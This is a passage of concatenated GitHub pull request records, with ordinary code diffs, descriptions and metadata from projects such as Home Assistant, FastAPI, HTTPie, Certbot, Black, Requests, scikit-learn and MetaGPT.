if song and station: + return '{}: {}'.format(station, song) else: - return info.station + return song or station diff --git a/requirements_all.txt b/requirements_all.txt index e8d7a6719432..03f8715ab221 100644 --- a/requirements_all.txt +++ b/requirements_all.txt @@ -447,7 +447,7 @@ radiotherm==1.2 # rpi-rf==0.9.5 # homeassistant.components.media_player.yamaha -rxv==0.2.0 +rxv==0.3.0 # homeassistant.components.media_player.samsungtv samsungctl==0.5.1
**Description:** This pull request adds support for basic playback functionality like play, pause, stop, next and previous for input sources that support it in the Yamaha receiver. It also adds support for media title, artist and album if the information is available. **Checklist:** If user exposed functionality or configuration variables are added/changed: - [x] Documentation added/updated in [home-assistant.github.io](https://github.com/home-assistant/home-assistant.github.io) If the code communicates with devices, web services, or third-party tools: - [x] New dependencies have been added to the `REQUIREMENTS` variable ([example](https://github.com/home-assistant/home-assistant/blob/dev/homeassistant/components/keyboard.py#L16)). - [x] New dependencies have been added to `requirements_all.txt` by running `script/gen_requirements_all.py`.
https://api.github.com/repos/home-assistant/core/pulls/3985
2016-10-22T07:25:04Z
2016-11-02T01:50:03Z
2016-11-02T01:50:03Z
2017-03-17T17:10:37Z
1,549
home-assistant/core
39,242
Fix default extra response
diff --git a/fastapi/openapi/models.py b/fastapi/openapi/models.py index ddc5c6847f917..3dd9f04dc8385 100644 --- a/fastapi/openapi/models.py +++ b/fastapi/openapi/models.py @@ -210,10 +210,6 @@ class Response(BaseModel): links: Optional[Dict[str, Union[Link, Reference]]] = None -class Responses(BaseModel): - default: Response - - class Operation(BaseModel): tags: Optional[List[str]] = None summary: Optional[str] = None @@ -222,7 +218,7 @@ class Operation(BaseModel): operationId: Optional[str] = None parameters: Optional[List[Union[Parameter, Reference]]] = None requestBody: Optional[Union[RequestBody, Reference]] = None - responses: Union[Responses, Dict[str, Response]] + responses: Dict[str, Response] # Workaround OpenAPI recursive reference callbacks: Optional[Dict[str, Union[Dict[str, Any], Reference]]] = None deprecated: Optional[bool] = None diff --git a/fastapi/openapi/utils.py b/fastapi/openapi/utils.py index 2ee8c241cd334..c3cc120fd6eca 100644 --- a/fastapi/openapi/utils.py +++ b/fastapi/openapi/utils.py @@ -49,7 +49,7 @@ "3XX": "Redirection", "4XX": "Client Error", "5XX": "Server Error", - "default": "Default Response", + "DEFAULT": "Default Response", } @@ -205,9 +205,10 @@ def get_openapi_path( response.setdefault( "description", status_text or "Additional Response" ) - operation.setdefault("responses", {})[ - str(additional_status_code).upper() - ] = response + status_code_key = str(additional_status_code).upper() + if status_code_key == "DEFAULT": + status_code_key = "default" + operation.setdefault("responses", {})[status_code_key] = response status_code = str(route.status_code) response_schema = {"type": "string"} if lenient_issubclass(route.response_class, JSONResponse): diff --git a/tests/test_additional_responses_router.py b/tests/test_additional_responses_router.py index ce66ead7e0c71..028026e67fea7 100644 --- a/tests/test_additional_responses_router.py +++ b/tests/test_additional_responses_router.py @@ -26,6 +26,7 @@ async def b(): responses={ "400": {"description": "Error with str"}, "5xx": {"description": "Error with range, lower"}, + "default": {"description": "A default response"}, }, ) async def c(): @@ -74,6 +75,7 @@ async def c(): "description": "Successful Response", "content": {"application/json": {"schema": {}}}, }, + "default": {"description": "A default response"}, }, "summary": "C", "operationId": "c_c_get",
Fix `"default"` extra response, when combined with responses with status codes and status code ranges. Continuation of #435.
https://api.github.com/repos/tiangolo/fastapi/pulls/489
2019-08-30T21:25:15Z
2019-08-30T21:34:48Z
2019-08-30T21:34:48Z
2019-08-30T21:34:51Z
692
tiangolo/fastapi
23,248
Show --check-status warning with --quiet as well
diff --git a/CHANGELOG.rst b/CHANGELOG.rst index d84119538e..c47be9d672 100644 --- a/CHANGELOG.rst +++ b/CHANGELOG.rst @@ -9,7 +9,7 @@ This project adheres to `Semantic Versioning <https://semver.org/>`_. `2.4.0-dev`_ (unreleased) ------------------------- - +* Show a ``--check-status`` warning with ``--quiet`` as well, not only when the output si redirected. (`#1026`_) * Fixed upload with ``--session`` (`#1020`_). * Fixed a missing blank line between request and response (`#1006`_). @@ -488,3 +488,4 @@ This project adheres to `Semantic Versioning <https://semver.org/>`_. .. _#963: https://github.com/httpie/httpie/issues/963 .. _#1006: https://github.com/httpie/httpie/issues/1006 .. _#1020: https://github.com/httpie/httpie/issues/1020 +.. _#1026: https://github.com/httpie/httpie/issues/1026 diff --git a/README.rst b/README.rst index 47d65bcbc6..4abf607853 100644 --- a/README.rst +++ b/README.rst @@ -1292,7 +1292,7 @@ Quiet output ------------ ``--quiet`` redirects all output that would otherwise go to ``stdout`` -and ``stderr`` (except for error messages) to ``/dev/null``. +and ``stderr`` to ``/dev/null`` (except for errors and warnings). This doesn’t affect output to a file via ``--output`` or ``--download``. .. code-block:: bash diff --git a/httpie/core.py b/httpie/core.py index 3f46603e52..c71edd2ca0 100644 --- a/httpie/core.py +++ b/httpie/core.py @@ -185,7 +185,7 @@ def request_body_read_callback(chunk: bytes): final_response = message if args.check_status or downloader: exit_status = http_status_to_exit_status(http_status=message.status_code, follow=args.follow) - if not env.stdout_isatty and exit_status != ExitStatus.SUCCESS: + if exit_status != ExitStatus.SUCCESS and (not env.stdout_isatty or args.quiet): env.log_error(f'HTTP {message.raw.status} {message.raw.reason}', level='warning') write_message(requests_message=message, env=env, args=args, with_headers=with_headers, with_body=do_write_body) diff --git a/tests/test_output.py b/tests/test_output.py index 7510408a50..d5b15e4693 100644 --- a/tests/test_output.py +++ b/tests/test_output.py @@ -54,6 +54,21 @@ def test_quiet(self, httpbin, argument_name): assert r == '' assert r.stderr == '' + def test_quiet_with_check_status_non_zero(self, httpbin): + r = http( + '--quiet', '--check-status', httpbin + '/status/500', + tolerate_error_exit_status=True, + ) + assert 'http: warning: HTTP 500' in r.stderr + + def test_quiet_with_check_status_non_zero_pipe(self, httpbin): + r = http( + '--quiet', '--check-status', httpbin + '/status/500', + tolerate_error_exit_status=True, + env=MockEnvironment(stdout_isatty=False) + ) + assert 'http: warning: HTTP 500' in r.stderr + @mock.patch('httpie.cli.argtypes.AuthCredentials._getpass', new=lambda self, prompt: 'password') def test_quiet_with_password_prompt(self, httpbin):
#1026
https://api.github.com/repos/httpie/cli/pulls/1028
2021-01-30T23:54:20Z
2021-01-30T23:58:57Z
2021-01-30T23:58:57Z
2021-03-15T07:37:38Z
858
httpie/cli
34,117
Remove a defer.returnValue call.
diff --git a/tests/test_feedexport.py b/tests/test_feedexport.py index c7d955bc74e..277555608e6 100644 --- a/tests/test_feedexport.py +++ b/tests/test_feedexport.py @@ -2299,7 +2299,7 @@ def run_and_export(self, spider_cls, settings): content[feed["format"]].append(file.read_bytes()) finally: self.tearDown() - defer.returnValue(content) + return content @defer.inlineCallbacks def assertExportedJsonLines(self, items, rows, settings=None):
Fixes #6204 :shrug:
https://api.github.com/repos/scrapy/scrapy/pulls/6205
2024-01-12T14:31:18Z
2024-01-12T17:50:41Z
2024-01-12T17:50:41Z
2024-01-15T15:16:35Z
128
scrapy/scrapy
34,428
[FAW] move coloparam setting in test code.
diff --git a/colossalai/nn/_ops/cache_embedding/parallel_freq_aware_embedding.py b/colossalai/nn/_ops/cache_embedding/parallel_freq_aware_embedding.py index 4400d6fc2034..083076532c91 100644 --- a/colossalai/nn/_ops/cache_embedding/parallel_freq_aware_embedding.py +++ b/colossalai/nn/_ops/cache_embedding/parallel_freq_aware_embedding.py @@ -67,9 +67,6 @@ def __init__(self, self.init_parameters() else: assert isinstance(_weight, ColoParameter), "initialized weight must in type of ColoParameter" - _weight.process_group = ProcessGroup(tp_degree=self.world_size) - _weight.set_tensor_spec(ShardSpec(dims=[-1], num_partitions=[self.world_size]), - ComputeSpec(ComputePattern.TP1D)) self._weight = _weight @property diff --git a/tests/test_tensor/ops/test_cache_embedding.py b/tests/test_tensor/ops/test_cache_embedding.py index ac5b3bc40853..8471975dfc9e 100644 --- a/tests/test_tensor/ops/test_cache_embedding.py +++ b/tests/test_tensor/ops/test_cache_embedding.py @@ -8,11 +8,9 @@ import colossalai from colossalai.utils import free_port from colossalai.testing import rerun_if_address_is_in_use -from colossalai.tensor import ColoParameter +from colossalai.tensor import ColoParameter, ProcessGroup, ShardSpec, ComputePattern, ComputeSpec from colossalai.nn._ops.cache_embedding import CachedParamMgr, FreqAwareEmbeddingBag, ParallelFreqAwareEmbeddingBag -from colossalai.nn._ops.cache_embedding import CachedParamMgr, FreqAwareEmbeddingBag - NUM_EMBED, EMBED_DIM = 10, 8 BATCH_SIZE = 8 @@ -161,6 +159,11 @@ def run_parallel_freq_aware_embed(rank, world_size): weight = torch.rand(num_embed, embed_dim) coloweight = ColoParameter(weight.clone().detach().cpu(), requires_grad=False) + # initialize the tensor spec for the embedding weight parameter, + # which is an ColoParameter. + coloweight.process_group = ProcessGroup(tp_degree=world_size) + coloweight.set_tensor_spec(ShardSpec(dims=[-1], num_partitions=[world_size]), ComputeSpec(ComputePattern.TP1D)) + model = ParallelFreqAwareEmbeddingBag.from_pretrained(coloweight, include_last_offset=True, freeze=False,
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/1429
2022-08-10T06:12:01Z
2022-08-10T06:31:53Z
2022-08-10T06:31:53Z
2022-08-10T06:31:53Z
557
hpcaitech/ColossalAI
10,983
fix benchmark
diff --git a/test_tipc/benchmark_train.sh b/test_tipc/benchmark_train.sh index d5b4e2f11a..e3e4d627fa 100644 --- a/test_tipc/benchmark_train.sh +++ b/test_tipc/benchmark_train.sh @@ -135,7 +135,6 @@ else batch_size=${params_list[1]} batch_size=`echo ${batch_size} | tr -cd "[0-9]" ` precision=${params_list[2]} - # run_process_type=${params_list[3]} run_mode=${params_list[3]} device_num=${params_list[4]} IFS=";" @@ -160,10 +159,9 @@ for batch_size in ${batch_size_list[*]}; do gpu_id=$(set_gpu_id $device_num) if [ ${#gpu_id} -le 1 ];then - run_process_type="SingleP" log_path="$SAVE_LOG/profiling_log" mkdir -p $log_path - log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}_${device_num}_profiling" + log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_mode}_${device_num}_profiling" func_sed_params "$FILENAME" "${line_gpuid}" "0" # sed used gpu_id # set profile_option params tmp=`sed -i "${line_profile}s/.*/${profile_option}/" "${FILENAME}"` @@ -179,8 +177,8 @@ for batch_size in ${batch_size_list[*]}; do speed_log_path="$SAVE_LOG/index" mkdir -p $log_path mkdir -p $speed_log_path - log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}_${device_num}_log" - speed_log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}_${device_num}_speed" + log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_mode}_${device_num}_log" + speed_log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_mode}_${device_num}_speed" func_sed_params "$FILENAME" "${line_profile}" "null" # sed profile_id as null cmd="bash test_tipc/test_train_inference_python.sh ${FILENAME} benchmark_train > ${log_path}/${log_name} 2>&1 " echo $cmd @@ -191,13 +189,12 @@ for batch_size in ${batch_size_list[*]}; do eval "cat ${log_path}/${log_name}" # parser log - _model_name="${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}" + _model_name="${model_name}_bs${batch_size}_${precision}_${run_mode}" cmd="${python} ${BENCHMARK_ROOT}/scripts/analysis.py --filename ${log_path}/${log_name} \ --speed_log_file '${speed_log_path}/${speed_log_name}' \ --model_name ${_model_name} \ --base_batch_size ${batch_size} \ --run_mode ${run_mode} \ - --run_process_type ${run_process_type} \ --fp_item ${precision} \ --keyword ips: \ --skip_steps 2 \ @@ -211,13 +208,12 @@ for batch_size in ${batch_size_list[*]}; do else IFS=";" unset_env=`unset CUDA_VISIBLE_DEVICES` - run_process_type="MultiP" log_path="$SAVE_LOG/train_log" speed_log_path="$SAVE_LOG/index" mkdir -p $log_path mkdir -p $speed_log_path - log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}_${device_num}_log" - speed_log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}_${device_num}_speed" + log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_mode}_${device_num}_log" + speed_log_name="${repo_name}_${model_name}_bs${batch_size}_${precision}_${run_mode}_${device_num}_speed" func_sed_params "$FILENAME" "${line_gpuid}" "$gpu_id" # sed used gpu_id func_sed_params "$FILENAME" "${line_profile}" "null" # sed --profile_option as null cmd="bash test_tipc/test_train_inference_python.sh ${FILENAME} benchmark_train > ${log_path}/${log_name} 2>&1 " @@ -228,14 +224,13 @@ for batch_size in ${batch_size_list[*]}; do export model_run_time=$((${job_et}-${job_bt})) eval "cat ${log_path}/${log_name}" # parser 
log - _model_name="${model_name}_bs${batch_size}_${precision}_${run_process_type}_${run_mode}" + _model_name="${model_name}_bs${batch_size}_${precision}_${run_mode}" cmd="${python} ${BENCHMARK_ROOT}/scripts/analysis.py --filename ${log_path}/${log_name} \ --speed_log_file '${speed_log_path}/${speed_log_name}' \ --model_name ${_model_name} \ --base_batch_size ${batch_size} \ --run_mode ${run_mode} \ - --run_process_type ${run_process_type} \ --fp_item ${precision} \ --keyword ips: \ --skip_steps 2 \
fix benchmark: the run_process_type distinction has been removed from the benchmark tooling, so the related handling in benchmark_train.sh is removed accordingly.
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/5671
2022-03-09T07:56:16Z
2022-03-09T10:54:05Z
2022-03-09T10:54:05Z
2022-03-09T10:54:05Z
1,212
PaddlePaddle/PaddleOCR
41,943
Update leauto_upgrades with tests from #5402
diff --git a/tests/letstest/scripts/test_leauto_upgrades.sh b/tests/letstest/scripts/test_leauto_upgrades.sh index 51472f2e6cb..355fead2e90 100755 --- a/tests/letstest/scripts/test_leauto_upgrades.sh +++ b/tests/letstest/scripts/test_leauto_upgrades.sh @@ -65,6 +65,7 @@ iQIDAQAB " if [ $(python -V 2>&1 | cut -d" " -f 2 | cut -d. -f1,2 | sed 's/\.//') -eq 26 ]; then + RUN_PYTHON3_TESTS=1 if command -v python3; then echo "Didn't expect Python 3 to be installed!" exit 1 @@ -85,11 +86,25 @@ if [ $(python -V 2>&1 | cut -d" " -f 2 | cut -d. -f1,2 | sed 's/\.//') -eq 26 ]; exit 1 fi unset VENV_PATH - EXPECTED_VERSION=$(grep -m1 LE_AUTO_VERSION certbot-auto | cut -d\" -f2) - if ! ./cb-auto -v --debug --version -n 2>&1 | grep "$EXPECTED_VERSION" ; then - echo "Certbot didn't upgrade as expected!" - exit 1 - fi +fi + +if ./letsencrypt-auto -v --debug --version | grep "WARNING: couldn't find Python" ; then + echo "Had problems checking for updates!" + exit 1 +fi + +EXPECTED_VERSION=$(grep -m1 LE_AUTO_VERSION certbot-auto | cut -d\" -f2) +if ! /opt/eff.org/certbot/venv/bin/letsencrypt --version 2>&1 | grep "$EXPECTED_VERSION" ; then + echo upgrade appeared to fail + exit 1 +fi + +if ! diff letsencrypt-auto letsencrypt-auto-source/letsencrypt-auto ; then + echo letsencrypt-auto and letsencrypt-auto-source/letsencrypt-auto differ + exit 1 +fi + +if [ "$RUN_PYTHON3_TESTS" = 1 ]; then if ! command -v python3; then echo "Python3 wasn't properly installed" exit 1 @@ -98,11 +113,7 @@ if [ $(python -V 2>&1 | cut -d" " -f 2 | cut -d. -f1,2 | sed 's/\.//') -eq 26 ]; echo "Python3 wasn't used in venv!" exit 1 fi -elif ! ./letsencrypt-auto -v --debug --version || ! diff letsencrypt-auto letsencrypt-auto-source/letsencrypt-auto ; then - echo upgrade appeared to fail - exit 1 fi - echo upgrade appeared to be successful if [ "$(tools/readlink.py ${XDG_DATA_HOME:-~/.local/share}/letsencrypt)" != "/opt/eff.org/certbot/venv" ]; then
I only put these in the comments of #5402 due to merge conflicts with #5392. These tests should just add more testing to the current version in `master`, but if this isn't merged by the time I'm testing the release, I'll test against both versions of the script.
https://api.github.com/repos/certbot/certbot/pulls/5407
2018-01-10T20:36:06Z
2018-02-07T01:01:59Z
2018-02-07T01:01:59Z
2018-02-07T01:07:39Z
698
certbot/certbot
34
Add dot_color to BulletedList
diff --git a/manimlib/mobject/svg/tex_mobject.py b/manimlib/mobject/svg/tex_mobject.py index 60b299e6d1..20f79afbeb 100644 --- a/manimlib/mobject/svg/tex_mobject.py +++ b/manimlib/mobject/svg/tex_mobject.py @@ -257,6 +257,7 @@ class BulletedList(TextMobject): CONFIG = { "buff": MED_LARGE_BUFF, "dot_scale_factor": 2, + "dot_color": WHITE, # Have to include because of handle_multiple_args implementation "template_tex_file_body": TEMPLATE_TEXT_FILE_BODY, "alignment": "", @@ -266,7 +267,7 @@ def __init__(self, *items, **kwargs): line_separated_items = [s + "\\\\" for s in items] TextMobject.__init__(self, *line_separated_items, **kwargs) for part in self: - dot = TexMobject("\\cdot").scale(self.dot_scale_factor) + dot = TexMobject("\\cdot", color=self.dot_color).scale(self.dot_scale_factor) dot.next_to(part[0], LEFT, SMALL_BUFF) part.add_to_back(dot) self.arrange(
I felt like using only white in BulletedList wasn't visually appealing, so the ability to change the color of the bullet seemed useful. ```python l = BulletedList("Item 1", "Item 2", "Item 3", dot_color=BLUE) ``` produces <img width="366" alt="image" src="https://user-images.githubusercontent.com/31397379/83178468-65864d00-a0d5-11ea-8fc2-2cd665def137.png">
https://api.github.com/repos/3b1b/manim/pulls/1112
2020-05-28T18:22:16Z
2020-09-30T15:27:29Z
2020-09-30T15:27:29Z
2020-09-30T15:27:30Z
277
3b1b/manim
18,564
Fix missing leak sensor battery expose
diff --git a/homeassistant/components/yolink/sensor.py b/homeassistant/components/yolink/sensor.py index 7c578fbaa73924..4679c3e670b7cf 100644 --- a/homeassistant/components/yolink/sensor.py +++ b/homeassistant/components/yolink/sensor.py @@ -22,6 +22,7 @@ ATTR_COORDINATORS, ATTR_DEVICE_CO_SMOKE_SENSOR, ATTR_DEVICE_DOOR_SENSOR, + ATTR_DEVICE_LEAK_SENSOR, ATTR_DEVICE_LOCK, ATTR_DEVICE_MANIPULATOR, ATTR_DEVICE_MOTION_SENSOR, @@ -61,6 +62,7 @@ class YoLinkSensorEntityDescription( BATTERY_POWER_SENSOR = [ ATTR_DEVICE_DOOR_SENSOR, + ATTR_DEVICE_LEAK_SENSOR, ATTR_DEVICE_MOTION_SENSOR, ATTR_DEVICE_TH_SENSOR, ATTR_DEVICE_VIBRATION_SENSOR,
## Type of change

- [ ] Dependency upgrade
- [x] Bugfix (non-breaking change which fixes an issue)
- [ ] New integration (thank you!)
- [ ] New feature (which adds functionality to an existing integration)
- [ ] Breaking change (fix/feature causing existing functionality to break)
- [ ] Code quality improvements to existing code or addition of tests

## Additional information

- This PR fixes or closes issue: fixes #
- This PR is related to issue:
- Link to documentation pull request:

## Checklist

- [x] The code change is tested and works locally.
- [x] Local tests pass. **Your PR cannot be merged unless tests pass**
- [x] There is no commented out code in this PR.
- [x] I have followed the [development checklist][dev-checklist]
- [x] The code has been formatted using Black (`black --fast homeassistant tests`)
- [x] Tests have been added to verify that the new code works.

If user exposed functionality or configuration variables are added/changed:

- [ ] Documentation added/updated for [www.home-assistant.io][docs-repository]

If the code communicates with devices, web services, or third-party tools:

- [ ] The [manifest file][manifest-docs] has all fields filled out correctly. Updated and included derived files by running: `python3 -m script.hassfest`.
- [ ] New or updated dependencies have been added to `requirements_all.txt`. Updated by running `python3 -m script.gen_requirements_all`.
- [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description.
- [ ] Untested files have been added to `.coveragerc`.

The integration reached or maintains the following [Integration Quality Scale][quality-scale]:

- [ ] No score or internal
- [ ] 🥈 Silver
- [ ] 🥇 Gold
- [ ] 🏆 Platinum

To help with the load of incoming pull requests:

- [ ] I have reviewed two other [open pull requests][prs] in this repository.

[prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure
[dev-checklist]: https://developers.home-assistant.io/docs/en/development_checklist.html
[manifest-docs]: https://developers.home-assistant.io/docs/en/creating_integration_manifest.html
[quality-scale]: https://developers.home-assistant.io/docs/en/next/integration_quality_scale_index.html
[docs-repository]: https://github.com/home-assistant/home-assistant.io
https://api.github.com/repos/home-assistant/core/pulls/74084
2022-06-28T02:13:37Z
2022-06-28T06:39:12Z
2022-06-28T06:39:12Z
2022-06-29T07:01:56Z
192
home-assistant/core
39,256
fix ContextMixin ut error
diff --git a/metagpt/context_mixin.py b/metagpt/context_mixin.py index 060150f4d..59daa692f 100644 --- a/metagpt/context_mixin.py +++ b/metagpt/context_mixin.py @@ -33,20 +33,16 @@ class ContextMixin(BaseModel): private_llm: Optional[BaseLLM] = Field(default=None, exclude=True) @model_validator(mode="after") - def validate_extra(self): - self._process_extra(**(self.model_extra or {})) + def validate_context_mixin_extra(self): + self._process_context_mixin_extra() return self - def _process_extra( - self, - context: Optional[Context] = None, - config: Optional[Config] = None, - llm: Optional[BaseLLM] = None, - ): + def _process_context_mixin_extra(self): """Process the extra field""" - self.set_context(context) - self.set_config(config) - self.set_llm(llm) + kwargs = self.model_extra or {} + self.set_context(kwargs.pop("context", None)) + self.set_config(kwargs.pop("config", None)) + self.set_llm(kwargs.pop("llm", None)) def set(self, k, v, override=False): """Set attribute""" diff --git a/metagpt/roles/role.py b/metagpt/roles/role.py index 5da39f80f..c098f95af 100644 --- a/metagpt/roles/role.py +++ b/metagpt/roles/role.py @@ -23,7 +23,7 @@ from __future__ import annotations from enum import Enum -from typing import Any, Iterable, Optional, Set, Type, Union +from typing import Iterable, Optional, Set, Type, Union from pydantic import BaseModel, ConfigDict, Field, SerializeAsAny, model_validator @@ -121,7 +121,7 @@ def history(self) -> list[Message]: class Role(SerializationMixin, ContextMixin, BaseModel): """Role/Agent""" - model_config = ConfigDict(arbitrary_types_allowed=True, extra="ignore") + model_config = ConfigDict(arbitrary_types_allowed=True, extra="allow") name: str = "" profile: str = "" @@ -149,16 +149,21 @@ class Role(SerializationMixin, ContextMixin, BaseModel): __hash__ = object.__hash__ # support Role as hashable type in `Environment.members` - def __init__(self, **data: Any): + @model_validator(mode="after") + def validate_role_extra(self): + self._process_role_extra() + return self + + def _process_role_extra(self): self.pydantic_rebuild_model() - super().__init__(**data) + kwargs = self.model_extra or {} if self.is_human: self.llm = HumanProvider(None) self._check_actions() self.llm.system_prompt = self._get_prefix() - self._watch(data.get("watch") or [UserRequirement]) + self._watch(kwargs.pop("watch", [UserRequirement])) if self.latest_observed_msg: self.recovered = True
**Features** - fix ContextMixin ut error **Result** ![1706861820441](https://github.com/geekan/MetaGPT/assets/60704484/1b296512-f78d-4e60-a193-d2efcfe23000)
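A minimal pydantic v2 sketch (illustrative names, not MetaGPT code) of the mechanism this fix switches to: with `extra="allow"`, unknown constructor kwargs land in `model_extra`, where an after-validator can consume them instead of overriding `__init__`.

```python
from pydantic import BaseModel, ConfigDict, model_validator

class Role(BaseModel):
    model_config = ConfigDict(extra="allow")
    name: str = ""

    @model_validator(mode="after")
    def consume_extra(self):
        # Extra kwargs passed to the constructor are kept in model_extra.
        extras = self.model_extra or {}
        print("extras seen by the validator:", extras)
        return self

Role(name="pm", watch=["UserRequirement"])
# extras seen by the validator: {'watch': ['UserRequirement']}
```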
https://api.github.com/repos/geekan/MetaGPT/pulls/827
2024-02-02T08:17:56Z
2024-02-02T09:10:39Z
2024-02-02T09:10:39Z
2024-02-02T09:10:39Z
724
geekan/MetaGPT
16,796
fix regex in test_black.py
diff --git a/tests/test_black.py b/tests/test_black.py index 3d5d3982817..4267c6110a9 100644 --- a/tests/test_black.py +++ b/tests/test_black.py @@ -31,7 +31,7 @@ import click import pytest -import regex as re +import re from click import unstyle from click.testing import CliRunner from pathspec import PathSpec @@ -70,7 +70,7 @@ R = TypeVar("R") # Match the time output in a diff, but nothing else -DIFF_TIME = re.compile(r"\t[\d-:+\. ]+") +DIFF_TIME = re.compile(r"\t[\d\-:+\. ]+") @contextmanager
I was trying to get rid of the `regex` dependency, but found instead that we were incorrectly using a character range in this regex.
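A minimal sketch (not from the PR) of why the escaped hyphen matters: inside a character class, an unescaped `-` between two items denotes a range, so a literal hyphen has to be escaped or placed at the edge of the class. The last assertion checks the corrected pattern against a typical diff timestamp line.

```python
import re

assert re.fullmatch(r"[a-c]+", "abc")   # "a-c" is the range a..c
assert not re.search(r"[a-c]", "-")     # ...so a literal "-" is not matched
assert re.search(r"[a\-c]", "-")        # escaping the hyphen makes it literal

# The corrected pattern from this PR, matching the time part of a diff header line.
DIFF_TIME = re.compile(r"\t[\d\-:+\. ]+")
assert DIFF_TIME.search("+++ b/blah.py\t2021-11-25 14:20:28.000000 +0000")
```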
https://api.github.com/repos/psf/black/pulls/2643
2021-11-25T14:20:28Z
2021-11-26T02:34:19Z
2021-11-26T02:34:19Z
2021-11-26T02:34:22Z
166
psf/black
24,177
Adds Akamai
diff --git a/diagrams/saas/cdn.py b/diagrams/saas/cdn.py index dec52654f..3733621da 100644 --- a/diagrams/saas/cdn.py +++ b/diagrams/saas/cdn.py @@ -8,6 +8,10 @@ class _Cdn(_Saas): _icon_dir = "resources/saas/cdn" +class Akamai(_Cdn): + _icon = "akamai.png" + + class Cloudflare(_Cdn): _icon = "cloudflare.png" diff --git a/docs/nodes/saas.md b/docs/nodes/saas.md index e42f106a7..607fa09c0 100644 --- a/docs/nodes/saas.md +++ b/docs/nodes/saas.md @@ -17,6 +17,7 @@ Node classes list of saas provider. ## saas.cdn +- **diagrams.saas.cdn.Akamai** - **diagrams.saas.cdn.Cloudflare** ## saas.chat diff --git a/resources/saas/cdn/akamai.png b/resources/saas/cdn/akamai.png new file mode 100644 index 000000000..2c008ed2a Binary files /dev/null and b/resources/saas/cdn/akamai.png differ
https://api.github.com/repos/mingrammer/diagrams/pulls/267
2020-09-08T22:27:07Z
2020-09-14T11:56:03Z
2020-09-14T11:56:02Z
2020-09-14T11:56:03Z
314
mingrammer/diagrams
52,603
Fix encoding issue in test_response_reason_unicode_fallback
diff --git a/tests/test_requests.py b/tests/test_requests.py index e77e024a7d..24f296f000 100755 --- a/tests/test_requests.py +++ b/tests/test_requests.py @@ -1026,13 +1026,13 @@ def test_response_reason_unicode_fallback(self): # check raise_status falls back to ISO-8859-1 r = requests.Response() r.url = 'some url' - reason = b'Komponenttia ei l\xf6ydy' - r.reason = reason + reason = u'Komponenttia ei löydy' + r.reason = reason.encode('latin-1') r.status_code = 500 r.encoding = None with pytest.raises(requests.exceptions.HTTPError) as e: r.raise_for_status() - assert reason.decode('latin-1') in str(e) + assert reason in e.value.args[0] def test_response_chunk_size_type(self): """Ensure that chunk_size is passed as None or an integer, otherwise
`test_response_reason_unicode_fallback` is currently failing in Python 2. The original proposed fix in #3557 unfortunately didn't address the underlying issue. While this patch should fix the test now, it may be worth taking a brief moment to discuss how we envision the original PR #3554 working. Currently an error retrieved from an `except` clause can't be cast as `str`, `unicode`, written to a file, or easily decoded in Python 2. It prints to the console fine, but that's about it. This seems like a semi-serious issue for making this exception usable. I need to run a few more tests this evening or tomorrow, so we can sit on this for the weekend unless someone has some obvious insight I'm missing.
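For reference, a small Python 3 sketch of the fallback the test exercises: the byte `\xf6` is not valid UTF-8 on its own, but it decodes to `ö` under ISO-8859-1 (latin-1), which is why the test encodes the reason with latin-1.

```python
raw = b"Komponenttia ei l\xf6ydy"   # the byte string used in the original test

try:
    text = raw.decode("utf-8")
except UnicodeDecodeError:
    # 0xf6 is not a valid UTF-8 sequence here, so fall back to ISO-8859-1.
    text = raw.decode("latin-1")

print(text)  # Komponenttia ei löydy
```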
https://api.github.com/repos/psf/requests/pulls/3576
2016-09-16T16:23:45Z
2016-09-20T14:48:40Z
2016-09-20T14:48:40Z
2021-09-08T02:10:16Z
232
psf/requests
32,813
DOC add target_names in LFW fetchers
diff --git a/sklearn/datasets/_lfw.py b/sklearn/datasets/_lfw.py index be01ae6279e27..33c1234f907b7 100644 --- a/sklearn/datasets/_lfw.py +++ b/sklearn/datasets/_lfw.py @@ -308,13 +308,15 @@ def fetch_lfw_people( target : numpy array of shape (13233,) Labels associated to each face image. Those labels range from 0-5748 and correspond to the person IDs. + target_names : numpy array of shape (5749,) + Names of all persons in the dataset. + Position in array corresponds to the person ID in the target array. DESCR : str Description of the Labeled Faces in the Wild (LFW) dataset. (data, target) : tuple if ``return_X_y`` is True .. versionadded:: 0.20 - """ lfw_home, data_folder_path = _check_fetch_lfw( data_home=data_home, funneled=funneled, download_if_missing=download_if_missing @@ -489,6 +491,9 @@ def fetch_lfw_pairs( target : numpy array of shape (2200,). Shape depends on ``subset``. Labels associated to each pair of images. The two label values being different persons or the same person. + target_names : numpy array of shape (2,) + Explains the target values of the target array. + 0 corresponds to "Different person", 1 corresponds to "same person". DESCR : str Description of the Labeled Faces in the Wild (LFW) dataset. """
Follow-up of #23582. We need to target `main` instead of `1.1.X`.
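A short usage sketch of the attribute being documented (assumes the LFW data can be downloaded locally): `target_names` maps the integer labels in `target` back to person names.

```python
from sklearn.datasets import fetch_lfw_people

lfw = fetch_lfw_people(min_faces_per_person=70)
print(lfw.target_names[:3])              # the first few person names
print(lfw.target_names[lfw.target[0]])   # name of the person in the first image
```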
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/23795
2022-06-29T12:46:33Z
2022-06-29T13:56:48Z
2022-06-29T13:56:48Z
2022-06-29T13:56:48Z
369
scikit-learn/scikit-learn
46,503
remove redundant else block in DatabricksExecutionTrigger
